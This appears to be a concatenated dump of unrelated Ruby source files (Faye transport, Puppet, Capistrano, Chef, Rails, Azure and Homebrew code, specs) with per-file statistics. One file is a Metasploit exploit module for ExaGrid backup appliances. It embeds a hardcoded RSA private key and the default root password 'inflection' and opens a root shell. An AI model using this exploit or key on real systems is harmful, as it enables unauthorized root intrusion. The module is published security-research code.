:form => { 'field' => 'select', 'options_for_select' => [ ['Ubuntu 16.04 (xenial)','ubuntu-16.04'], ['CentOS 7.0','centos-7.0']] } }
29.785714
188
0.602261
910aac3f390d4fb90759df7ba8e655a46d7b62f6
1,960
module Faye class Transport::Http < Transport def self.usable?(dispatcher, endpoint, &callback) callback.call(URI === endpoint) end def encode(messages) Faye.to_json(messages) end def request(messages) content = encode(messages) params = build_params(content) request = create_request(params) request.callback do handle_response(messages, request.response) store_cookies(request.response_header['SET_COOKIE']) end request.errback do handle_error(messages) end request end private def build_params(content) params = { :head => { 'Content-Length' => content.bytesize, 'Content-Type' => 'application/json', 'Host' => @endpoint.host + (@endpoint.port ? ":#{@endpoint.port}" : '') }.merge(@dispatcher.headers), :body => content, :timeout => -1 # for em-http-request < 1.0 } cookie = get_cookies params[:head]['Cookie'] = cookie unless cookie == '' params end def create_request(params) version = EventMachine::HttpRequest::VERSION.split('.')[0].to_i options = {:inactivity_timeout => 0} if @proxy[:origin] uri = URI.parse(@proxy[:origin]) options[:proxy] = {:host => uri.host, :port => uri.port} if uri.user options[:proxy][:authorization] = [uri.user, uri.password] end end if version >= 1 client = EventMachine::HttpRequest.new(@endpoint.to_s, options) else client = EventMachine::HttpRequest.new(@endpoint.to_s) end client.post(params) end def handle_response(messages, response) replies = MultiJson.load(response) rescue nil if replies receive(replies) else handle_error(messages) end end end Transport.register 'long-polling', Transport::Http end
23.614458
91
0.592347
03934c7e181439ca7f9cc8dff76297c31e094601
1,725
Puppet::Type.newtype(:rabbitmq_parameter) do desc 'Type for managing rabbitmq parameters' ensurable do defaultto(:present) newvalue(:present) do provider.create end newvalue(:absent) do provider.destroy end end autorequire(:service) { 'rabbitmq-server' } validate do fail('component_name parameter is required.') if self[:ensure] == :present and self[:component_name].nil? fail('value parameter is required.') if self[:ensure] == :present and self[:value].nil? end newparam(:name, :namevar => true) do desc 'combination of name@vhost to set parameter for' newvalues(/^\S+@\S+$/) end newproperty(:component_name) do desc 'The component_name to use when setting parameter, eg: shovel or federation' validate do |value| resource.validate_component_name(value) end end newproperty(:value) do desc 'A hash of values to use with the component name you are setting' validate do |value| resource.validate_value(value) end munge do |value| resource.munge_value(value) end end autorequire(:rabbitmq_vhost) do [self[:name].split('@')[1]] end def validate_component_name(value) if value.empty? raise ArgumentError, "component_name must be defined" end end def validate_value(value) unless [Hash].include?(value.class) raise ArgumentError, "Invalid value" end value.each do |k,v| unless [String, TrueClass, FalseClass].include?(v.class) raise ArgumentError, "Invalid value" end end end def munge_value(value) value.each do |k,v| if (v =~ /\A[-+]?[0-9]+\z/) value[k] = v.to_i end end value end end
23.310811
109
0.657391
7a60a499952eb201ecd0d6a0f860aa3a5a27b98c
2,151
# server-based syntax # ====================== # Defines a single server with a list of roles and multiple properties. # You can define all roles on a single server, or split them: # server 'example.com', user: 'deploy', roles: %w{app db web}, my_property: :my_value # server 'example.com', user: 'deploy', roles: %w{app web}, other_property: :other_value # server 'db.example.com', user: 'deploy', roles: %w{db} server '54.149.118.151', user: 'deploy', roles: %w{web app db} # role-based syntax # ================== # Defines a role with one or multiple servers. The primary server in each # group is considered to be the first unless any hosts have the primary # property set. Specify the username and a domain or IP for the server. # Don't use `:all`, it's a meta role. # role :app, %w{[email protected]}, my_property: :my_value # role :web, %w{[email protected] [email protected]}, other_property: :other_value # role :db, %w{[email protected]} # Configuration # ============= # You can set any configuration variable like in config/deploy.rb # These variables are then only loaded and set in this stage. # For available Capistrano configuration variables see the documentation page. # http://capistranorb.com/documentation/getting-started/configuration/ # Feel free to add new variables to customise your setup. # Custom SSH Options # ================== # You may pass any option but keep in mind that net/ssh understands a # limited set of options, consult the Net::SSH documentation. # http://net-ssh.github.io/net-ssh/classes/Net/SSH.html#method-c-start # # Global options # -------------- # set :ssh_options, { # keys: %w(/home/rlisowski/.ssh/id_rsa), # forward_agent: false, # auth_methods: %w(password) # } # # The server-based syntax can be used to override options: # ------------------------------------ # server 'example.com', # user: 'user_name', # roles: %w{web app}, # ssh_options: { # user: 'user_name', # overrides user setting above # keys: %w(/home/user_name/.ssh/id_rsa), # forward_agent: false, # auth_methods: %w(publickey password) # # password: 'please use keys' # }
34.693548
88
0.668991
d507925ec83e249c19787ffa5dfb56561a9352b0
1,123
# # Author:: Adam Jacob (<[email protected]>) # Copyright:: Copyright 2009-2016, Chef Software Inc. # License:: Apache License, Version 2.0 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # require "chef/knife" class Chef class Knife class DataBagList < Knife deps do require "chef/data_bag" end banner "knife data bag list (options)" category "data bag" option :with_uri, :short => "-w", :long => "--with-uri", :description => "Show corresponding URIs" def run output(format_list_for_display(Chef::DataBag.list)) end end end end
26.116279
74
0.680321
e96ff642991791e4c8a4b5c8fe83ca0e27209cdb
1,114
#Fibonacci Number Location by Length def num_digits(num) num.to_i.to_s.length end def find_fibonacci_index_by_length(n) answer = 3 #start with 1, 1. fib_1_ago, fib_2_ago = 1, 1 number_to_check = fib_1_ago + fib_2_ago while num_digits(number_to_check) < n fib_2_ago, fib_1_ago = fib_1_ago, number_to_check number_to_check = fib_1_ago + fib_2_ago answer += 1 end answer end puts find_fibonacci_index_by_length(2) == 7 # 1 1 2 3 5 8 13 puts find_fibonacci_index_by_length(3) == 12 # 1 1 2 3 5 8 13 21 34 55 89 144 puts find_fibonacci_index_by_length(10) == 45 puts find_fibonacci_index_by_length(100) == 476 puts find_fibonacci_index_by_length(1000) == 4782 puts find_fibonacci_index_by_length(10000) == 47847 puts find_fibonacci_index_by_length(2)# == 7 # 1 1 2 3 5 8 13 puts find_fibonacci_index_by_length(3)# == 12 # 1 1 2 3 5 8 13 21 34 55 89 144 puts find_fibonacci_index_by_length(10)# == 45 puts find_fibonacci_index_by_length(100)# == 476 puts find_fibonacci_index_by_length(1000)# == 4782 puts find_fibonacci_index_by_length(10000)# == 47847
35.935484
86
0.740575
084a7151555d5687356bd1bded4e00604fe9c9bd
305
begin require 'openssl' OpenSSL # ensure OpenSSL is loaded vendor = File.expand_path('../vendor', __FILE__) $:.unshift(vendor) unless $:.include?(vendor) require 'net/http/persistent' USE_PERSISTENT = true rescue LoadError, NameError => e require 'net/http' USE_PERSISTENT = false end
19.0625
50
0.711475
18b9955f390c8a3cfddf19f9244e437888d69450
473
require 'test_helper' class StaticPagesControllerTest < ActionDispatch::IntegrationTest test "should get home" do get static_pages_home_url assert_response :success end test "should get about" do get static_pages_about_url assert_response :success end test "should get band" do get static_pages_band_url assert_response :success end test "should get sport" do get static_pages_sport_url assert_response :success end end
18.92
65
0.752643
012707a8ebffc57bd4c4aaccaa74d491ab740091
515
require "bundler/setup" require "storage" require "pathname" require "minitest/utils" require "minitest/autorun" require "mocha" require "mocha/mini_test" TMP = Pathname.new(File.expand_path(File.dirname(__FILE__) + "/tmp")) RESOURCES = Pathname.new(File.expand_path(File.dirname(__FILE__) + "/resources")) class Minitest::Test setup do FileUtils.rm_rf(TMP) rescue nil FileUtils.mkdir_p(TMP) rescue nil end end class NullObject def initialize(*) end def method_missing(*) self end end
17.758621
81
0.735922
f8628a0f9a9e60181e29dc11359379687e0932b8
50
module MlbBattingAverages VERSION = "0.1.0" end
12.5
25
0.74
4a6aa11860399c44e44055b34fcd4d6348a022c9
896
require 'spec_helper' require 'rollbar/delay/resque' describe Rollbar::Delay::Resque do describe '.call' do let(:payload) do { :key => 'value' } end let(:loaded_hash) do Rollbar::JSON.load(Rollbar::JSON.dump(payload)) end before do allow(Resque).to receive(:inline?).and_return(true) end it 'process the payload' do expect(Rollbar).to receive(:process_from_async_handler).with(loaded_hash) described_class.call(payload) end context 'with exceptions processing payload' do let(:exception) { Exception.new } before do expect(Rollbar).to receive(:process_from_async_handler) .with(loaded_hash) .and_raise(exception) end it 'raises an exception' do expect do described_class.call(payload) end.to raise_error(exception) end end end end
22.4
79
0.642857
ff83ca9ec3216d97d275bf869362ff693c48ac16
626
class AuthController < ApplicationController before_action :authenticate_user!, :validate_service, except: :callback def callback login = Login.from_omniauth(request.env['omniauth.auth']) raise CanCan::AccessDenied.new('Not authorized!', :read, SupplyTeachers) unless login.permit?(:supply_teachers) user = find_or_create(login) sign_in user redirect_to session[:requested_path] || supply_teachers_path end protected def find_or_create(login) user = User.find_or_initialize_by(email: login.email) user.new_record? user.roles = %i[buyer st_access] user.save user end end
27.217391
115
0.742812
3841029e98ef494daec9e930c849b662c216de06
5,586
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Network::Mgmt::V2019_08_01 module Models # # Route Filter Resource. # class RouteFilter < Resource include MsRestAzure # @return [Array<RouteFilterRule>] Collection of RouteFilterRules # contained within a route filter. attr_accessor :rules # @return [Array<ExpressRouteCircuitPeering>] A collection of references # to express route circuit peerings. attr_accessor :peerings # @return [Array<ExpressRouteCircuitPeering>] A collection of references # to express route circuit ipv6 peerings. attr_accessor :ipv6peerings # @return [ProvisioningState] The provisioning state of the route filter # resource. Possible values include: 'Succeeded', 'Updating', 'Deleting', # 'Failed' attr_accessor :provisioning_state # @return [String] A unique read-only string that changes whenever the # resource is updated. attr_accessor :etag # # Mapper for RouteFilter class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'RouteFilter', type: { name: 'Composite', class_name: 'RouteFilter', model_properties: { id: { client_side_validation: true, required: false, serialized_name: 'id', type: { name: 'String' } }, name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'name', type: { name: 'String' } }, type: { client_side_validation: true, required: false, read_only: true, serialized_name: 'type', type: { name: 'String' } }, location: { client_side_validation: true, required: false, serialized_name: 'location', type: { name: 'String' } }, tags: { client_side_validation: true, required: false, serialized_name: 'tags', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, rules: { client_side_validation: true, required: false, serialized_name: 'properties.rules', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'RouteFilterRuleElementType', type: { name: 'Composite', class_name: 'RouteFilterRule' } } } }, peerings: { client_side_validation: true, required: false, serialized_name: 'properties.peerings', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'ExpressRouteCircuitPeeringElementType', type: { name: 'Composite', class_name: 'ExpressRouteCircuitPeering' } } } }, ipv6peerings: { client_side_validation: true, required: false, serialized_name: 'properties.ipv6Peerings', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'ExpressRouteCircuitPeeringElementType', type: { name: 'Composite', class_name: 'ExpressRouteCircuitPeering' } } } }, provisioning_state: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.provisioningState', type: { name: 'String' } }, etag: { client_side_validation: true, required: false, read_only: true, serialized_name: 'etag', type: { name: 'String' } } } } } end end end end
31.738636
79
0.440566
4a87355675d385629451c028b17d181d1e2e7eee
252
# Be sure to restart your server when you modify this file. # All Legislative preferences are here. Legislative::Application.config.application_name = 'Congreso Interactivo' Legislative::Application.config.created_by_name = 'CongresoInteractivo.org'
36
75
0.81746
1aaef7a32e3c46490e2a92ac249e90defca35d29
70
load File.expand_path('../../../capistrano/tasks/ssh.rake', __FILE__)
35
69
0.7
e8a3fd1f1a0e193313b03650c072d8c018e469c3
548
# frozen_string_literal: true # Define order by filter rule # module QueryFilter module Rules class OrderBy < Scope DIRECTIONS = %w[asc desc].freeze def name 'order_by' end def valid?(params) params[key].present? && DIRECTIONS.include?(params[direction_key].try(:downcase)) end def direction_key @direction_key ||= (@options[:via] || 'sort_direction').to_sym end def normalize_params(values) [values[key], values[direction_key]] end end end end
19.571429
89
0.624088
ed815dd54bac0f8a8cea89ef98bc0347b2ece62c
270
class SuperDemandsController < ApplicationController def discard @demand = SuperDemand.find_by(discard_token: params[:token]) @demand.update(discarded_at: Time.now) NotifyJob.perform_later("Super Demand discarded: #{@demand.email}", "DemandBot") end end
33.75
84
0.759259
f8da5cda224e986351fb1bd1124a14ad2b6784d3
2,808
class ErlangAT20 < Formula desc "Programming language for highly scalable real-time systems" homepage "https://www.erlang.org/" # Download tarball from GitHub; it is served faster than the official tarball. url "https://github.com/erlang/otp/archive/OTP-20.3.8.24.tar.gz" sha256 "588e34a89f9ea8ebc3bda0918e4e1f4f7366888278f5e7ece60f6f1fa42aef60" bottle do cellar :any sha256 "ccdc86633693f2dec689584d3104cd50d32b43ca6367ec464750740c886e8ff1" => :catalina sha256 "4decc33224ae2cadf809ce5b11f6ca456fdd97cd9daec9174a8c15011e9dd34f" => :mojave sha256 "5a2ee8713cf03b0c9ee0671dc842599f7f1782e324bc8fd1313d28a8c55ccfd2" => :high_sierra end keg_only :versioned_formula depends_on "autoconf" => :build depends_on "automake" => :build depends_on "libtool" => :build depends_on "[email protected]" depends_on "wxmac" resource "man" do url "https://www.erlang.org/download/otp_doc_man_20.3.tar.gz" mirror "https://fossies.org/linux/misc/legacy/otp_doc_man_20.3.tar.gz" sha256 "17e0b2f94f11576a12526614a906ecad629b8804c25e6c18523f7c4346607112" end resource "html" do url "https://www.erlang.org/download/otp_doc_html_20.3.tar.gz" mirror "https://fossies.org/linux/misc/legacy/otp_doc_html_20.3.tar.gz" sha256 "8099b62e9fa24b3f90eaeda151fa23ae729c8297e7d3fd8adaca865b35a3125d" end def install # Work around Xcode 11 clang bug # https://bitbucket.org/multicoreware/x265/issues/514/wrong-code-generated-on-macos-1015 ENV.append_to_cflags "-fno-stack-check" if DevelopmentTools.clang_build_version >= 1010 # Unset these so that building wx, kernel, compiler and # other modules doesn't fail with an unintelligable error. %w[LIBS FLAGS AFLAGS ZFLAGS].each { |k| ENV.delete("ERL_#{k}") } # Do this if building from a checkout to generate configure system "./otp_build", "autoconf" if File.exist? "otp_build" args = %W[ --disable-debug --disable-silent-rules --prefix=#{prefix} --enable-dynamic-ssl-lib --enable-hipe --enable-kernel-poll --enable-sctp --enable-shared-zlib --enable-smp-support --enable-threads --enable-wx --with-ssl=#{Formula["[email protected]"].opt_prefix} --without-javac --enable-darwin-64bit ] args << "--with-dynamic-trace=dtrace" if MacOS::CLT.installed? system "./configure", *args system "make" system "make", "install" (lib/"erlang").install resource("man").files("man") doc.install resource("html") end def caveats; <<~EOS Man pages can be found in: #{opt_lib}/erlang/man Access them with `erl -man`, or add this directory to MANPATH. EOS end test do system "#{bin}/erl", "-noshell", "-eval", "crypto:start().", "-s", "init", "stop" end end
32.651163
93
0.702991
87b88941f4394384e4659b9ac4ebafcec9507463
5,862
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'net/ssh' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report include Msf::Exploit::Remote::SSH def initialize(info = {}) super(update_info(info, { 'Name' => 'ExaGrid Known SSH Key and Default Password', 'Description' => %q{ ExaGrid ships a public/private key pair on their backup appliances to allow passwordless authentication to other ExaGrid appliances. Since the private key is easily retrievable, an attacker can use it to gain unauthorized remote access as root. Additionally, this module will attempt to use the default password for root, 'inflection'. }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Targets' => [ [ "Universal", {} ] ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, 'Author' => ['egypt'], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-1560' ], # password [ 'CVE', '2016-1561' ], # private key [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] ], 'DisclosureDate' => "Apr 07 2016", 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'DefaultTarget' => 0 })) register_options( [ # Since we don't include Tcp, we have to register this manually Opt::RHOST(), Opt::RPORT(22) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(ssh_options) begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, 'root', ssh_options) end rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh_socket # Create a new session from the socket, then dump it. conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) ssh_socket = nil return conn else return false end end # Ghetto hack to prevent the shell detection logic from hitting false # negatives due to weirdness with ssh sockets. We already know it's a shell # because auth succeeded by this point, so no need to do the check anyway. module TrustMeItsAShell def _check_shell(*args) true end end def exploit payload_instance.extend(TrustMeItsAShell) factory = ssh_socket_factory ssh_options = { auth_methods: ['publickey'], config: false, use_agent: false, key_data: [ key_data ], port: rport, proxy: factory, non_interactive: true } ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] conn = do_login(ssh_options) unless is_success?(conn, true) ssh_options[:auth_methods] = ['password'] ssh_options[:password] = 'inflection' ssh_options.delete(:key_data) conn = do_login(ssh_options) is_success?(conn, false) end end def is_success?(conn,key_based) if conn print_good "Successful login" service_data = { address: rhost, port: rport, protocol: 'tcp', service_name: 'ssh', workspace_id: myworkspace_id, } credential_data = { username: 'root', private_type: ( key_based ? :ssh_key : :password ), private_data: ( key_based ? key_data : 'inflection' ), origin_type: :service, module_fullname: fullname, }.merge(service_data) core = create_credential(credential_data) login_data = { core: core, last_attempted: Time.now, }.merge(service_data) create_credential_login(login_data) handler(conn.lsock) true else false end end def key_data <<EOF -----BEGIN RSA PRIVATE KEY----- MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10 hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk 86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg== -----END RSA PRIVATE KEY----- EOF end end
29.756345
148
0.660355
ab1db5617d434705fe270c7df8dc5e15a85faebb
1,863
# frozen_string_literal: true ::RSpec.describe ::Koffer::Promise do let(:promise) { described_class.new } describe '#rescue' do context 'when the promise resolves' do subject! { promise.rescue { |reason| "recovered from #{reason.message}" } } before { promise.resolve(1) } it { is_expected.to have_attributes(state: :resolved, value: 1) } end context 'when the promise resolves and the block raises an error' do subject! { promise.rescue { |reason| raise reason } } before { promise.resolve(1) } it { is_expected.to have_attributes(state: :resolved, value: 1) } end context 'when the promise rejects' do subject! { promise.rescue { |reason| "recovered from #{reason.message}" } } before { promise.reject(::RuntimeError.new('total failure')) } it { is_expected.to have_attributes(state: :resolved, value: 'recovered from total failure') } end context 'when the promise rejects and the block raises an error' do subject! { promise.rescue { |reason| raise "failed: #{reason.message}" } } before { promise.reject(::RuntimeError.new('total failure')) } it { is_expected.to have_attributes(state: :rejected, reason: have_attributes(message: 'failed: total failure')) } end context 'when the promise is already resolved' do subject! { described_class.resolve(1).rescue { |reason| "recovered from #{reason.message}" } } it { is_expected.to have_attributes(state: :resolved, value: 1) } end context 'when the promise is already rejected' do subject! { described_class.reject(error).rescue { |reason| "recovered from #{reason.message}" } } let(:error) { ::RuntimeError.new('total failure') } it { is_expected.to have_attributes(state: :resolved, value: 'recovered from total failure') } end end end
34.5
120
0.672034
398a85103e7eb1430b71fabc119f149f5900b42e
1,645
require 'spec_helper' module Boilerpipe::SAX describe HTMLContentHandler do describe '.new' do it 'sets up tag actions' it 'initializes state' end describe '#start_element' do it 'saves the last tag element' do subject.start_element 'div' expect(subject.last_start_tag).to eq :DIV end it 'converts the tag name into a symbol' do subject.start_element 'title' expect(subject.last_start_tag).to eq :TITLE end end describe '#characters' do end describe '#end_element' do end describe '#flush_block' do end describe '#text_document' do end describe '#token_buffer_size' do end describe '#is_word?' do end describe '#increase_in_ignorable_element!' do end describe '#decrease_in_ignorable_element!' do end describe '#enter_body_tag!' do end describe '#exit_body_tag!' do end describe '#in_ignorable_element?' do end describe '#in_anchor_tag?' do end describe '#add_text_block' do end describe '#append_space' do end describe '#append_text' do end describe '#append_token' do end describe '#add_label_action' do context 'with a nil as the last element in the label stacks' do before { subject.start_element('boom') } it 'removes that nil' do expect(subject.label_stacks.first).to eq nil subject.add_label_action(:boom) expect(subject.label_stacks.first).to eq [:boom] expect(subject.label_stacks.size).to eq 1 end end end end end
19.583333
69
0.63465
080501037c76d3aa1890f0b1c326569ac5b494c2
7,440
class FenestrationConstruction include Mongoid::Document include Mongoid::Timestamps field :name, type: String field :fenestration_type, type: String field :fenestration_product_type, type: String field :assembly_context, type: String field :certification_method, type: String field :skylight_glazing, type: String field :skylight_curb, type: String field :operable_window_configuration, type: String field :greenhouse_garden_window, type: Integer field :fenestration_framing, type: String field :fenestration_panes, type: String field :glazing_tint, type: String field :window_divider, type: String field :diffusing, type: Integer field :shgc, type: Float field :shgc_center_of_glass, type: Float field :u_factor, type: Float field :u_factor_center_of_glass, type: Float field :visible_transmittance, type: Float field :visible_transmittance_center_of_glass, type: Float belongs_to :project def self.children_models children = [ ] end def self.xml_fields xml_fields = [ { db_field_name: 'name', xml_field_name: 'Name' }, { db_field_name: 'fenestration_type', xml_field_name: 'FenType' }, { db_field_name: 'fenestration_product_type', xml_field_name: 'FenProdType' }, { db_field_name: 'assembly_context', xml_field_name: 'AssmContext' }, { db_field_name: 'certification_method', xml_field_name: 'CertificationMthd' }, { db_field_name: 'skylight_glazing', xml_field_name: 'SkyltGlz' }, { db_field_name: 'skylight_curb', xml_field_name: 'SkyltCurb' }, { db_field_name: 'operable_window_configuration', xml_field_name: 'OperableWinConfiguration' }, { db_field_name: 'greenhouse_garden_window', xml_field_name: 'GreenhouseGardenWin' }, { db_field_name: 'fenestration_framing', xml_field_name: 'FenFrm' }, { db_field_name: 'fenestration_panes', xml_field_name: 'FenPanes' }, { db_field_name: 'glazing_tint', xml_field_name: 'GlzTint' }, { db_field_name: 'window_divider', xml_field_name: 'WinDivider' }, { db_field_name: 'diffusing', xml_field_name: 'Diffusing' }, { db_field_name: 'shgc', xml_field_name: 'SHGC' }, { db_field_name: 'shgc_center_of_glass', xml_field_name: 'SHGCCOG' }, { db_field_name: 'u_factor', xml_field_name: 'UFactor' }, { db_field_name: 'u_factor_center_of_glass', xml_field_name: 'UFactorCOG' }, { db_field_name: 'visible_transmittance', xml_field_name: 'VT' }, { db_field_name: 'visible_transmittance_center_of_glass', xml_field_name: 'VTCOG' } ] end # This method is autogenerated. Do not change directly. def to_sdd_xml(meta, xml) xml.send(meta[:xml_name]) do self.class.xml_fields.each do |field| if self[field[:db_field_name]] if self[field[:db_field_name]].is_a? Array logger.debug 'Translating to XML and the object is an Array' self[field[:db_field_name]].each_with_index do |instance, index| xml.send(:"#{field[:xml_field_name]}", instance, 'index' => index) end else xml.send(:"#{field[:xml_field_name]}", self[field[:db_field_name]]) end end end # go through children if they have something to add, call their methods kids = self.class.children_models unless kids.nil? || kids.empty? kids.each do |k| models = send(k[:model_name].pluralize) models.each do |m| m.to_sdd_xml(k, xml) end end end end end # This method is autogenerated. Do not change directly. # Take the map of model name and xml name, and the hash (from the XML). def self.from_sdd_json(meta, h) o = nil if meta && h self_model = meta[:model_name].camelcase(:upper).constantize o = self_model.create_from_sdd_json(meta, h) if o o.create_children_from_sdd_json(meta, h) o.save! o.reload # in case of relationships being updated else fail "Could not create instance of #{self_model} for #{meta[:model_name]}" end end o end # This method is autogenerated. Do not change directly. def self.create_from_sdd_json(meta, h) new_h = {} # Find fields as defined by the XML self_model = meta[:model_name].camelcase(:upper).constantize self_model.xml_fields.each do |field| if h[field[:xml_field_name]] logger.debug "Field Data Type: #{self_model.fields[field[:db_field_name]].options[:type]}" if self_model.fields[field[:db_field_name]].options[:type].to_s == 'Array' logger.debug 'Data model has an array as the field' # check if the hash has an array, otherwise make it an array if h[field[:xml_field_name]].is_a? Array logger.debug 'XML/JSON field is already an Array' new_h[field[:db_field_name]] = h[field[:xml_field_name]] else new_h[field[:db_field_name]] = [h[field[:xml_field_name]]] end else new_h[field[:db_field_name]] = h[field[:xml_field_name]] end end end # new_h can be empty if the xml has no fields, but still create the object o = self_model.new(new_h) o end # This method is autogenerated. Do not change directly. def create_children_from_sdd_json(meta, h) # Go through the children self_model = meta[:model_name].camelcase(:upper).constantize kids = self_model.children_models unless kids.nil? || kids.empty? kids.each do |k| # check if the kids have a json object at this level if h[k[:xml_name]] logger.debug "XML child is #{k[:xml_name]}" logger.debug "Model name is #{k[:model_name]}" if h[k[:xml_name]].is_a? Array logger.debug "#{k[:xml_name]} is an array, will add all the objects" h[k[:xml_name]].each do |h_instance| klass = k[:model_name].camelcase(:upper).constantize if klass.respond_to? :from_sdd_json model = klass.from_sdd_json(k, h_instance) # Assign the foreign key on the object model["#{meta[:model_name]}_id"] = id model.save! else logger.warn "Class #{klass} does not have instance method 'from_sdd_json'" end end elsif h[k[:xml_name]].is_a? Hash logger.debug "#{k[:xml_name]} is a single object, will add only one" klass = k[:model_name].camelcase(:upper).constantize if klass.respond_to? :from_sdd_json model = klass.from_sdd_json(k, h[k[:xml_name]]) # Assign the foreign key on the object model["#{meta[:model_name]}_id"] = id model.save! else logger.warn "Class #{klass} does not have instance method 'from_sdd_json'" end end end end end end def fenestration_type_enums %w(VerticalFenestration Skylight) end def assembly_context_enums %w(Manufactured FieldFabricated SiteBuilt) end def operable_window_configuration_enums [ '- specify -', 'CasementAwning', 'Sliding' ] end def window_divider_enums [ '- specify -', 'TrueDividedLite', 'DividerBtwnPanesLessThan7_16in', 'DividerBtwnPanesGreaterThanOrEqualTo7_16in' ] end end
36.292683
101
0.649328
b964d9e2d722025512ce0ba225bfb80fc64e0428
1,751
describe 'Chooser expected behaviors', js: true do context 'when using the chooser' do before do login visit new_permission_path find('#collection_option_selected').click() end it 'does not click the + button when pressing enter in the left filter box' do fill_in('from-filter', with: '\n') expect(page).to have_select('Selected Collections', options: []) end it 'does not click the + button when pressing enter in the right filter box' do fill_in('to-filter', with: '\n') expect(page).to have_select('Selected Collections', options: []) end end context 'when selecting a collection in the chooser' do before do ingest_response, concept_response_1 = publish_collection_draft @entry_id_1 = "#{concept_response_1.body['ShortName']}_#{concept_response_1.body['Version']} | #{concept_response_1.body['EntryTitle']}" login visit new_permission_path find('#collection_option_selected').click() within '#collectionsChooser' do select(@entry_id_1, from: 'Available Collections') find('.add_button').click end end it 'does not highlight an entry in the right column after using +/-' do expect(page).to have_select('Selected Collections', options: [@entry_id_1], selected: []) expect(page).to have_no_content('You must select at least 1 collection.') end it 'does not have an entry highlighted after filling in the filter' do within '#collectionsChooser' do select(@entry_id_1, from: 'Selected Collections') end fill_in('to-filter', with: @entry_id_1) expect(page).to have_select('Selected Collections', options: [@entry_id_1], selected: []) end end end
35.734694
142
0.680183
e814bd5ab5b9bda92a7a6f765c3ba18ca218142c
41
div.this_is do span.in_a_file render end
13.666667
22
0.829268
2629620604e3d10c129e2c3804280e74688e8f93
2,517
